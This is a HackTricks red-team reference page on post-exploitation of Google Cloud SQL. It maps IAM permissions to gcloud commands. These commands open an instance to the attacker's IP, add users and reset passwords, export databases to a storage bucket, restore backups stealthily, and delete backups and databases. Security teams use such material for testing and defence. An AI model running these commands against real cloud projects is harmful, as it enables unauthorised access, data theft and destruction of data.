GCP - Cloud SQL Post Exploitation

Reading time: 4 minutes

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Cloud SQL

For more information about Cloud SQL check:

GCP - Cloud SQL Enum

`cloudsql.instances.update`, ( `cloudsql.instances.get`)

To connect to the databases you just need access to the database port and know the username and password, there isn't any IAM requirements. So, an easy way to get access, supposing that the database has a public IP address, is to update the allowed networks and allow your own IP address to access it.

bash

# Use --assign-ip to make the database get a public IPv4
gcloud sql instances patch $INSTANCE_NAME \
    --authorized-networks "$(curl ifconfig.me)" \
    --assign-ip \
    --quiet

mysql -h <ip_db> # If mysql

# With cloudsql.instances.get you can use gcloud directly
gcloud sql connect mysql --user=root --quiet

It's also possible to use --no-backup to disrupt the backups of the database.

As these are the requirements I'm not completely sure what are the permissions cloudsql.instances.connect and cloudsql.instances.login for. If you know it send a PR!

`cloudsql.users.list`

Get a list of all the users of the database:

bash

gcloud sql users list --instance <intance-name>

`cloudsql.users.create`

This permission allows to create a new user inside the database:

bash

gcloud sql users create <username> --instance <instance-name> --password <password>

`cloudsql.users.update`

This permission allows to update user inside the database. For example, you could change its password:

bash

gcloud sql users set-password <username> --instance <instance-name> --password <password>

`cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get`

Backups might contain old sensitive information, so it's interesting to check them.
Restore a backup inside a database:

bash

gcloud sql backups restore <backup-id> --restore-instance <instance-id>

To do it in a more stealth way it's recommended to create a new SQL instance and recover the data there instead of in the currently running databases.

`cloudsql.backupRuns.delete`

This permission allow to delete backups:

bash

gcloud sql backups delete <backup-id> --instance <instance-id>

`cloudsql.instances.export`, `storage.objects.create`

Export a database to a Cloud Storage Bucket so you can access it from there:

bash

# Export sql format, it could also be csv and bak
gcloud sql export sql <instance-id> <gs://bucketName/fileName> --database <db>

`cloudsql.instances.import`, `storage.objects.get`

Import a database (overwrite) from a Cloud Storage Bucket:

bash

# Import format SQL, you could also import formats bak and csv
gcloud sql import sql <instance-id> <gs://bucketName/fileName>

`cloudsql.databases.delete`

Delete a database from the db instance:

bash

gcloud sql databases delete <db-name> --instance <instance-id>

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.